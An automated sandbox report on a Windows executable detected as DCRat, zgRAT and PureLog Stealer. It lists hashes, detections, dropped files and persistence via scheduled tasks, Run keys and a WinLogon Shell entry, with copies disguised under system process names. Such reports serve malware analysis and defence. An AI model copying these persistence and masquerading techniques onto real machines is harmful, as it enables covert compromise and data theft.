                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1582599
                                      Start date and time:2024-12-31 02:21:04 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 49s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:86
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Sample name:KzLetzDiM8.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:A554052564261D9D5C7E0CD92514D3A0.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.expl.evad.winEXE@89/107@0/0
                                      EGA Information:
                                      • Successful, ratio: 33.3%
                                      HCA Information:
                                      • Successful, ratio: 55%
                                      • Number of executed functions: 247
                                      • Number of non-executed functions: 98
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, consent.exe, SIHClient.exe, conhost.exe, schtasks.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 500817cm.renyash.top, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target ComComponentDriverInto.exe, PID 6892 because it is empty
                                      • Execution Graph export aborted for target ComComponentDriverInto.exe, PID 8576 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      01:22:25Task SchedulerRun new task: ComComponentDriverInto path: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                                      01:22:25Task SchedulerRun new task: ComComponentDriverIntoC path: "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                                      01:22:25Task SchedulerRun new task: WmiPrvSE path: "C:\fontdriversavescrt\WmiPrvSE.exe"
                                      01:22:25Task SchedulerRun new task: WmiPrvSEW path: "C:\fontdriversavescrt\WmiPrvSE.exe"
                                      01:22:28Task SchedulerRun new task: OXiaaPzsOIsoqrAHYxAVs path: "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
                                      01:22:28Task SchedulerRun new task: OXiaaPzsOIsoqrAHYxAVsO path: "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
                                      01:22:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontdriversavescrt\WmiPrvSE.exe"
                                      01:22:30Task SchedulerRun new task: sihost path: "C:\Users\Default User\Documents\sihost.exe"
                                      01:22:30Task SchedulerRun new task: sihosts path: "C:\Users\Default User\Documents\sihost.exe"
                                      01:22:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto "C:\fontdriversavescrt\ComComponentDriverInto.exe"
                                      01:22:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\Default User\Documents\sihost.exe"
                                      01:23:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
                                      01:23:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontdriversavescrt\WmiPrvSE.exe"
                                      01:23:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto "C:\fontdriversavescrt\ComComponentDriverInto.exe"
                                      01:23:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\Default User\Documents\sihost.exe"
                                      01:23:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
                                      01:23:51AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\fontdriversavescrt\WmiPrvSE.exe"
                                      01:23:59AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto "C:\fontdriversavescrt\ComComponentDriverInto.exe"
                                      01:24:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\Default User\Documents\sihost.exe"
                                      01:24:17AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OXiaaPzsOIsoqrAHYxAVs "C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe"
                                      01:24:33AutostartRun: WinLogon Shell "C:\fontdriversavescrt\WmiPrvSE.exe"
                                      20:22:32API Interceptor424x Sleep call for process: powershell.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\AdxdALuR.logf3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              3e88PGFfkf.exeGet hashmaliciousDCRatBrowse
                                                9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                        CPNSQusnwC.exeGet hashmaliciousDCRatBrowse

                                                          Created / dropped Files

                                                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\86b7f9ef8ac2e1

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (780), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):780
                                                          Entropy (8bit):5.8921956402753715
                                                          Encrypted:false
                                                          SSDEEP:12:HFho3F70O8s0TU3a2Rw5TREoHMs2FN0YtODspz9N0YS83dmBVAZGKMxQvv0f:Hc/4U3a2e9xs9VYDgz9A83dKVKwmXm
                                                          MD5:8FDC8D9DDD983DE21512D4DEA164585E
                                                          SHA1:37B700382CC183BEB1F018CCB5D30A0D7932F32F
                                                          SHA-256:EA8C198B9F6B903BEA2C3EE999A5D0B121A8CB553A206C6FFF4C9A99068B7BC5
                                                          SHA-512:62E11EE190126C8BEFBA215B00F87F4901A9F48E7C051258DBC1A648DC55B4005DCC0D252BF4CA57F6B1F9CA2ECEECD1AB3764A099E0242BD1392C7039E1B062
                                                          Malicious:false
                                                          Preview:K4nWChWCt2LMbRGDmlNVXBh6mMFrHRcSWRKeFv9rvMGqQC1tLrkHdvZJWqt0co4ca30JHm81mgkK41qkUWgZqUyk2AIYBIPGSoQWMrljtsf6LPOeAJfGHevFEPRGdj0dRd1QkTXmu7q8z1ZnwnY2nJ8x2KS6afFK2BpsX74qv2VKyxPM0oT0K80IeEXZBbMO1gGxMrPysrGuxx9F5FGwLO93LgNSkepUqHTRrbAJYeHc1FVqESe6UaCnhMlpd7OOCwEqerYdE6XrGgCGLgNRAt9PEqufzVpbQ3aFBpLX4B1XCVgAJfd6t6OTwyly72ntR6bMF6EgU0X81lMtJtVU1srTpHSNDXZBYIGG4T4Nb7m2iPcKl2oOhT2iOHh8n1c7bWkteGy0yI24GzuaoIlLsKeEQi1ww5jkeobMosqfDyaZa8bZWGUfPROQ2fd6PBE2iSZbYhw5cFH4uEoSHcaplDUMaKUIPtQCth0Ii9AzUYDKKUfx1KywlZQe7MBNMnqszFKNOgtHbkUNAKCGphRE5daURVKV8xmrrVUFJSiVbrVAECexK4ipWlwVo052VYJn8nfpz77X86nOHZPO1WLDO6UGi8aTWq9DirBbgy7N7Lqa7iOOkrA9NFZBTZG1hnAS7kpZXysCZ8FDQ4J9uLsppA0cSAHHsGpUKXdW3y0v87jPAVvZPHGV4Vn6uNHXqkUSSv22awG6U7qrakc7Os2k9UZyugmprdEYnQ7Oc28cBKA7p5gJvKI7stS7WEI4KaO13REJnNeWuZjz

                                                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....

                                                          C:\Recovery\599176b30183e2

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with very long lines (611), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):611
                                                          Entropy (8bit):5.873529907204493
                                                          Encrypted:false
                                                          SSDEEP:12:+mTuwWxXsqEbfrjsuvk8akI3WeXGy+y5Vz6ODoSw2dDARBBg9u:+Eu7Xs5ns0C3XGiPz6Xd54u
                                                          MD5:8915B7FA8C6C22C77B62317580FA116B
                                                          SHA1:627C9E4B26A3F5D96737324193D2ED8CE3628445
                                                          SHA-256:78304BEE8A0CF11CCE7AA71EF36E5243000EE93A2C86EE6E818FA23489FAF70A
                                                          SHA-512:FFB88EFDD188F1C3A9E35180A09B4F9A200B190EF5F9A2CDA5143A7C0F676DDF233586E7BF1C5DEE94D9FAD4FBA2EDD1E9B48F4B3EB5C491D6A7C73451DF693A
                                                          Malicious:false
                                                          Preview:N3W2Ot1reb8a4mKkOPfSkZVtnqdqVE6hgUhE6kgMiIOMGJwJ7euZp3BxhmPhPLWZeb4kEGonsTubKJnd4Us0Uh2nTtgTU96WwyroPME1zGqVIkmY8wn4dfF6jRRUkUTtWXpWb9OrP0BN0getGHUiVC3QtvE75uRfx79v4Q69h6pme1FDxhNc9vXUdYnq5Qwfifa3gsy0LVAZWRv1pAKXhzfCkpRfnQERJKD8bMgEtXQnu77MnvB4FY7tAYS1bSM5RsPMNwZceGnJi1RmrE21OJLuMU8D3pmbKVWCsu90Wia8vxKIGqKWZVqHgfA3xWiydM9MfP47FBfqtN9YJz6NfQBzpOfNuFC99leiy7n1wMRYz9XTfmt8aVTNLKhQuqM98grIsbkLMEaS8m9p0LrIWEinRRWnaXHFARZTSPlEBivV5BOiL1Zi8En37D1aE6vy7USqNpXlknGySMsPCycj8jG5ofWPYK9Fw7YkthVfdx8V8zluUlYQdMzXNWCsSINZoABVxIfec7FKkv6z4m4wwtmkHAWWfnNVkiq8yP6LG3xgHpxcaNxqNan5XaNwwI9zttkBE8Aopsq25GdcN36SzgIJ5vkXBJZ747w

                                                          C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....

                                                          C:\Users\Default\Documents\66fc9ff0ee96c2

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):155
                                                          Entropy (8bit):5.562491567694741
                                                          Encrypted:false
                                                          SSDEEP:3:JQ5MPoJK2GirCLE2E3+A6yTCjvHYkRevE53IKTyAU0zQlKxyGIX7jHY1tfn:+c5UIfMa8CjLUsmCtVzQlKUfX7jOtf
                                                          MD5:738151E13F8E1BE31D29C42956977DE9
                                                          SHA1:182BCF64C61927BFACDE3706C87F9F1238CB04BA
                                                          SHA-256:649A72D39B47626493434C0EC16B495F9D98095164AC468268C68D4B4804BD13
                                                          SHA-512:050E56E0A9E55CF61F061720966E263C0B77502D0CC58356A05662FFC205D26DB572E4E0E71C7A3C38A1D44FF2D35C0872F4946CF7ADA8AD25A000BDE60F0DDA
                                                          Malicious:false
                                                          Preview:Aeuu9R7vj2LqAMlaFSYnmfTt87TFXbgfGqgnZLwSaQkgvN7jwoqEDigeLBvB71XHWqkUq7A4gFMW5w7uAuTtvbchJBcYZuVj3dKFnm3ynwi7WKjYDBBNhoV5ODKofmewunccm2HY1fG93eK9cDVYsHBPHP0

                                                          C:\Users\Default\Documents\sihost.exe

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2039296
                                                          Entropy (8bit):7.577687284159168
                                                          Encrypted:false
                                                          SSDEEP:49152:IeWIu4wEKRrqO5Tz2ZqORRlpK6aGAA/3:IvfNEqORbajA/
                                                          MD5:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          SHA1:99302EA1E8E802AC39B9A7E5A1FC63E2C1CBAEFA
                                                          SHA-256:E86BBF4C032BC999352EE883A862A9219607244D571CE220526DB0AE35F8E5F9
                                                          SHA-512:7C04B6243E6248657CB71C9FA0210C6C9D361BE0A23AFAE2EE933090F345826B48A0496522027E1C0EBDD68B666843EB07C74819560080AB9ECDFFA4248D8DF8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Documents\sihost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.ng............................n4... ...@....@.. ....................................@................................. 4..K....@.. ....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................P4......H........... ...........0...NP...3.......................................0..........(.... ........8........E........*.......9...8....*(.... ....~{...{....:....& ....8....(.... ....8....(.... ....~{...{....:....& ....8........0.......... ........8........E........6..._...........8....r...ps....z*...... ....~{...{....:....& ....8....~....:.... ....~{...{....:....& ....8........~....(J...~....(N... ....?.... ....~{...{....:R...& ....8G...~....(B... .... .... ....s....~....(F....

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ComComponentDriverInto.exe.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1396
                                                          Entropy (8bit):5.350961817021757
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19253
                                                          Entropy (8bit):5.005753878328145
                                                          Encrypted:false
                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                          MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                          SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                          SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                          SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                          Malicious:false
                                                          Preview:@...e................................................@..........

                                                          C:\Users\user\AppData\Local\Temp\RESC076.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Dec 31 03:10:16 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1952
                                                          Entropy (8bit):4.54879697430445
                                                          Encrypted:false
                                                          SSDEEP:24:HFZbW97OEtteDfH/wKTFVoXN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:JatEoKTfoXyluOulajfqXSfbNtmh5Z
                                                          MD5:83DEC8F327A509A6D81DE622B95007C8
                                                          SHA1:EDEE8202BDE0653C2993531A1AF831A871D365B2
                                                          SHA-256:C86C9478BD1A239054893B1460ED80C63D2C57D69F85248CCD5918E0F14BBA00
                                                          SHA-512:62E5B77A28A83ECC4542D1ED98D655FC14EC041CA202C62F7005C1E4075741059944A19FA9B2DB32F4DBC0EFE04015BA1E82C70ACB3EE7DDEEB97C24AE835C52
                                                          Malicious:false
                                                          Preview:L....`sg.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESC076.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\fontdriversavescrt.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0l1li0wh.4pz.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0s20ykpu.rdm.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
